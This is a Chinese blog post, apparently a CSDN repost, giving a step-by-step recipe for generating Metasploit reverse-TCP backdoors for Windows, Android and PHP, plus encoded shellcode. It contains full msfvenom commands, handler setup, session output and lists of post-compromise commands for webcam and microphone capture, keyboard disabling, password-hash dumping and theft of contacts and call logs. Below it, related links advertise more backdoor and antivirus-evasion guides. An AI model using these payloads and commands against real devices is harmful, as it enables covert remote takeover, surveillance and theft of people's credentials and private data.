通过Metasploit生成各种后门

最新推荐文章于 2022-09-08 22:32:12 发布
最新推荐文章于 2022-09-08 22:32:12 发布
阅读量487 收藏 7
点赞数
文章标签: php 移动开发 网络
原文链接:http://www.cnblogs.com/LyShark/p/9125335.html
版权

生成windows后门

 

1.首先生成后门

[root@localhost ~]# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.1.1 lport=6666 -f exe > ./lyshark.exe

2.进入Metasploit,执行以下操作

 
  
msf > use exploit/multi/handler
msf exploit(multi/handler) > 
 
  

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

 
  
msf exploit(multi/handler) > set lhost 192.168.1.25
 
  
lhost => 192.168.1.25
msf exploit(multi/handler) > set lport 6666
lport => 6666

 
  
msf exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.1.25:6666 
[*] Sending stage (179779 bytes) to 192.168.1.10
[*] Meterpreter session 1 opened (192.168.1.25:6666 -> 192.168.1.10:54264) at 2018-06-02 02:24:17 -0400
 
 
 
 
3.将我们的(lyshark.exe)拷贝到目标主机并运行
 
 
 
 
 
4.攻陷后常用查询命令
 
 
 
  
ps         #查看进程
migrate      #注入进程
run vnc      #查看远程桌面
 
  
cat        #查看文件
edit        #编辑文件
upload      #上传文件
download      #下载文件
rm        #删除文件
mkdir      #创建文件夹
rmdir      #删除文件夹
 
  
sessions -l  #查看会话
backgroud    #退出当前会话
 
  
 
enumdesktops          #在线用户数
uictl disable keyboard   #让键盘失效
uictl enable keyboard     #恢复键盘 
record_mic -d 10       #音频录制
webcam_stream        #开启摄像头
screenshot          #桌面抓图
sysinfo          #系统信息查询
getsystem          #获取最高权限
hashdump          #密码hash
 
 
 
 
 
 
 
生成Android后门
 
 
1.首先生成后门
 
 
 
  
[root@localhost ~]# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=6666 R > ./lyshark.apk
 
 
 
 
 
 
 
2.进入Metasploit,执行以下操作
 
 
 
  
msf > use exploit/multi/handler 
msf exploit(multi/handler) > 

msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp 
payload => android/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.1
lhost => 192.168.1.1
msf exploit(multi/handler) > set lport 6666
lport => 6666
msf exploit(multi/handler) > exploit 

[-] Handler failed to bind to 192.168.1.1:6666:-  -
[*] Started reverse TCP handler on 0.0.0.0:6666 
 
 
 
 
 
 
 
3.将我们的(lyshark.apk)拷贝到目标主机并运行
 
 
4.此时主机已经沦陷,查看一下系统吧
 
 
 
  
常用命令:
search                     #搜索 search -f *.jpg
download
webcam_stream -i 1/2       #打开前置或后置摄像头
check_root                 #检测root
dump_calllog               #下载电话记录
dump_contacts              #下载信息记录
geolocate                  #定位,需要下载谷歌地图
 
 
 
 
 
 
 
生成php后门
 
 
1.首先生成后门
 
 
 
  
[root@localhost ~]# msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.1.1 lport=6666 -f raw > ./lyshark.php
 
 
 
 
 
 
 
2.进入Metasploit,执行以下操作
 
 
 
  
msf > use exploit/multi/handler 
msf exploit(multi/handler) > 

msf exploit(multi/handler) > set payload php/meterpreter_reverse_tcp 
payload => php/meterpreter_reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.1
lhost => 192.168.1.1
msf exploit(multi/handler) > set lport 6666
lport => 6666
msf exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
msf exploit(multi/handler) > 
[-] Handler failed to bind to 192.168.1.1:6666:-  -
[*] Started reverse TCP handler on 0.0.0.0:6666 
 
 
 
 
 
 
 
3.将我们的(lyshark.php)拷贝到目标网页根路径
 
 
 
 
 
生成shellcode
 
 
1.生成shell    <-e 使用编码 - i 编码次数>
 
 
 
  
[root@localhost ~]# msfvenom -p windows/meterpreter/reverse_tcp LPORT=6666 LHOST=192.168.1.1 -e x86/shikata_ga_nai -i 11 -f py > lyshark.py
 
 
 

 

转载于:https://www.cnblogs.com/LyShark/p/9125335.html

                

        

        




    




    

      

        

            

              
                
                  weixin_30878361
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    7
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
红队专题-Meterpreter

				
			

			

				

					aming小老弟
				

				

					09-06
					
					480
					
				

			

		

		

			
				
Metasploit是一款开源的安全漏洞检测 渗透测试 工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。

			
		

	



                

              
                



	

		

			

				
					
Metasploit可执行后门.doc

				
			

			

				

					12-01
				

			

		

		

			
				
Metasploit可执行后门.doc

			
		

	



                


  
              

                


	

		

			

				
					
渗透测试神器——Metasploit Framerwork使用

				
			

			

				

					PICACHU+++的博客
				

				

					02-19
					
					4007
					
				

			

		

		

			
				
一、介绍

Metasploit Framework是一个编写、测试和使用exploit代码的完善环境。这个环境为渗透测试,shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Ruby编程语言编写的,并带有由C语言,汇编程序和Python编写的可选组件。



二、基本使用

1.信息收集


db_nmap /nmap

-T [0-5]:默认为T3,T4表示最大TCP扫描延迟为10ms

-sS:TCP SYN扫描,半开扫描

-sA:TCP ACK扫描

-sT:TCP扫描

			
		

	





	

		

			

				
					
使用msfconsole常见问题解决

				
			

			

				

					Amdy_amdy的博客
				

				

					08-23
					
					1万+
					
				

			

		

		

			
				
问题总结: 

(其中有我遇到的问题,有我没有遇到的,但我这里总结了一下别人遇到的,未雨绸缪)问题一(这个我也遇到过,不过我安装了上面的win 32就没问题了):原因:这个因为没有/root/.wine目录,执行以下命令即可创建该目录


wine cmd.exe


问题二(我没有遇到):原因:wine在使用过程中会出现图形化界面,这就需要这个基于Mozilla的Gecko渲染引擎来呈现,手动安装所需版本的wine-gecko即可。我们首先下载Wine提供的MSI二进制文件,请注意下载32位版本的,因为我

			
		

	



		

			
		



	

		

			

				
					
Metasploit 生成各种后门

				
			

			

				

					CSDN
				

				

					01-13
					
					5002
					
				

			

		

		

			
				
Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,同时该工具也是渗透测试环境中的利器,它支持多平台Payload的生成具有完全的跨平台性,本次实验将学会生成各种攻击载荷。linux系统下只需要执行下面的三条命令既可以自动安装,不过国内网速你懂的.

			
		

	





	

		

			

				
					
MSF给正常程序添加后门

				
			

			

				

					永远是少年
				

				

					06-10
					
					1493
					
				

			

		

		

			
				
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF给正常程序添加后门。
一、后门制作
二、监听开启
三、效果检验
(一)软件查杀测评
(二)软件效果检验

			
		

	





	

		

			

				
					
最新IE 0day漏洞Metasploit生成方法.txt

				
			

			

				

					03-18
				

			

		

		

			
				
最新IE 0day漏洞Metasploit生成方法.txt

			
		

	





	

		

			

				
					
[-] Handler failed to bind to x.x.x.x:port排错

					
热门推荐

				
			

			

				

					1stPeak's Blog
				

				

					02-18
					
					1万+
					
				

			

		

		

			
				
报错:

原因:
Kali的IP已经更换了,重新获取IP:ifconfig
如若还不行,重启msfconsole,再ifconfig,重新设置参数



			
		

	





	

		

			

				
					
[我的作死案例]图书馆泡妹记 上

				
			

			

				

					wjy397的专栏
				

				

					06-28
					
					3141
					
				

			

		

		

			
				
https://bbs.ichunqiu.com/thread-24168-1-1.html













吾本布衣i春秋-呆萌菜鸟

发表于前天14:28253388











本帖最后由 0nise 于 2017-6-26 10:14 编辑


缘起缘落:简单来说,图书馆看见一个妹子长得还不错,然后...

			
		

	





	

		

			

				
					
15. Metasploit之 后渗透测试阶段持久后门

				
			

			

				

					qq_41860876的博客
				

				

					05-05
					
					996
					
				

			

		

		

			
				
如果拿到目标的shell,假如目标重启了,那你的后门就不复存在了

首先先拿到目标的shell
这个我已经拿到了shell


第一种方法已经不能用了
是通过脚本来实现的
模块run metsvc 查看一下参数

-A自动启动匹配的漏洞利用/多重/处理程序以连接到服务
-h此帮助菜单
-r卸载现有的Meterpreter服务(必须手动删除文件)


启动自启动程序命令run metsvc -A
运...

			
		

	





	

		

			

				
					
msf生成php,使用msfpayload生成后门(asp,aspx,php,jsp,exe)等

				
			

			

				

					weixin_39752941的博客
				

				

					03-10
					
					742
					
				

			

		

		

			
				
msfpayload与msfencode参数说明执行msfpayload -h查看都有哪些参数执行msfencode -h查看都有哪些参数生成backdoor类型可以生成asp、aspx、php、jsp、war、exe等多种类型,下面介绍的使用方法就不一一测试了.msfpayload生成linux backdoor目标机器运行linux2,本机监听下端口,使用metasploit或者nc都行,测试...

			
		

	





	

		

			

				
					
MSF生成后门汇总

				
			

			

				

					干铮的博客
				

				

					10-10
					
					4641
					
				

			

		

		

			
				
可执行脚本反弹shell

1.windows下exe执行文件后门 


msfvenom -p windows/meterpreter/reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 x >文件路径/文件名
案例:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.193 LPORT=4444 x >/shell.exe

监听设置:


msfconsole
use exploit/mul...

			
		

	





	

		

			

				
					
Metasploit之多种后门生成

				
			

			

				

					weixin_30790841的博客
				

				

					08-30
					
					407
					
				

			

		

		

			
				
本章节的后门有以下几种

windows  -->使用模块“windows/meterpreter/reverse_tcp”
命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 X >test.exe
参考“09-Metasploit之我的远程控制软件”


li...

			
		

	





	

		

			

				
					
kali linux 生成后门文件命令:PHP,java,Linux,windows,android

				
			

			

				

					lilywang20119的博客
				

				

					11-13
					
					3791
					
				

			

		

		

			
				
生成后门文件:

在这里需要用到一个命令:msfvenom

在Kali的终端这种直接输入msfvenom -h就可以查看相关的参数信息。

下面示例的参数的解释直接通过-h参数查看就好,在下面就不再做多的说明了。




Windows后门:





[plain] view
 plain copy






msfvenom -p wind

			
		

	





	

		

			

				
					
利用Metasploit建立持续性会话后门

				
			

			

				

					大方子
				

				

					09-13
					
					1万+
					
				

			

		

		

			
				
 

 

环境Kali 1.0 IP:192.168.0.7windows 2003 IP:192.168.0.128本次文章 讲解Metasploit维持会话 建立服务后门首先先来生成一个 msf的exe后门

 

 

msf &gt; msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP -f exe -o /root/桌面/test....

			
		

	





	

		

			

				
					
kali下生成web端后门

				
			

			

				

					weixin_34397291的博客
				

				

					12-07
					
					791
					
				

			

		

		

			
				
  很多时候在***测试时选择web***害怕用的别人的马带有后门,这样自己的辛苦就要被别人不劳而获,很多时候我们都想拥有自己的马,那么这个时候你就应该使用kail来生成一个自己独特密码的web***了。 Kali Linux自带有好几个web***生成工具,下面我们来简单看几个:1.webacoo后门webacoo  -g -o test.php-g 制作后门代码-o 输出生成指定的后门程序文件...

			
		

	





	

		

			

				
					
msf-Msfvenonm生成后门木马

				
			

			

				

					weixin_45588247的博客
				

				

					08-27
					
					1万+
					
				

			

		

		

			
				
msf-Msfvenonm生成后门木马实验
文章目录msf-Msfvenonm生成后门木马实验一、工具:二、实验环境:三、`msfvenom`简介:四、各平台生成木马的方法:五、生成反向反弹木马:1. windows平台:1.1 生成反弹木马:1.2 捆绑一个程序伪装木马:2. :3. :4. :1.1 :2.1 :五、实验过程:1. :1.1 :1.1.1 :
一、工具:

Metasploit Framework(MSF)漏洞利用框架

二、实验环境:

靶   机: windows10虚拟机:192.

			
		

	





	

		

			

				
					
msf生成免杀木马

				
			

			

				

					qq_56426046的博客
				

				

					09-08
					
					5255
					
				

			

		

		

			
				
1.修改特征码免杀的最基本思想就是破坏特征,这个特征有可能是特征码,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。(特征码:能识别一个程序是病毒的一段不大于64字节的特征串)就目前的反病毒技术来讲,更改特征码从而达到免杀的效果事实上包含着两种方式。一种是改特征码,这也是免杀的最初方法。例如一个文件在某一个地址内有“灰鸽子上线成功!”这么一句话,表明它就是木马,只要将相应地址内的那句话改成别的就可以了,如果是无关痛痒的,直接将其删掉也未尝不可。

			
		

	





	

		

			

				
					
msfvenom生成后门程序及利用

				
			

			

				

					yy
				

				

					04-08
					
					7098
					
				

			

		

		

			
				
msfvenom

			
		

	





	

		

			

				
					
msfvenom生成安卓后门

					
最新发布

				
			

			

				

					09-10
				

			

		

		

			
				
msfvenom是Metasploit框架的一个工具,用于生成恶意软件,包括后门。在使用msfvenom生成安卓后门时,我们需要首先了解一些基本概念和步骤。  首先,我们需要安装和设置Metasploit框架。然后,我们可以使用msfvenom...

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值